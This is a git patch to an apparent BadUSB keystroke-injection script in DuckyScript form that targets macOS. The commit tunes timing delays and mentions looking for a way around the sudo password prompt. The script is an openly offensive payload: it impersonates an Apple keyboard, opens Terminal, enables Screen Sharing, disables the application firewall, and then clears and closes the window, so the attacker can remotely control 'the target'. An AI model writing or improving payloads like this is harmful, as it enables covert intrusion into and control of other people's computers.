From 7af085c2cbb4abf918808bbeed60e3f78f24c9d9 Mon Sep 17 00:00:00 2001 From: Narstybits Date: Wed, 31 May 2023 12:36:24 -0500 Subject: [PATCH] updated VNC, you need realvnc installed on your local Mac to remote in --- Executions/Virtual Network Remote Access.txt | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/Executions/Virtual Network Remote Access.txt b/Executions/Virtual Network Remote Access.txt index 67bfa4a..a4cefc4 100644 --- a/Executions/Virtual Network Remote Access.txt +++ b/Executions/Virtual Network Remote Access.txt @@ -6,7 +6,7 @@ REM and control that Mac from another computer using a VNC viewer application. REM This script disables the firewall REM disable the local address check for Screen Sharing -REM and enables screen sharing via sudo command (must know password) +REM and enables screen sharing via sudo command (must know password Trying to find a workaround) REM Now you can use your local computer to tap into the target @@ -27,18 +27,17 @@ REM Version: 1.0 REM Category: Execution ID 05ac:021e Apple:Keyboard -DELAY 1000 +DELAY 500 GUI SPACE DELAY 500 STRING terminal -DELAY 500 +DELAY 1000 ENTER DELAY 500 STRING sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.screensharing.plist -REM must enter admin password. Trying to find a workout -DELAY 7000 +DELAY 2000 ENTER -DELAY 1000 +DELAY 8000 STRING /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off DELAY 3000 ENTER @@ -48,6 +47,6 @@ DELAY 3000 ENTER DELAY 500 STRING clear -ENTER +DELAY 500 GUI w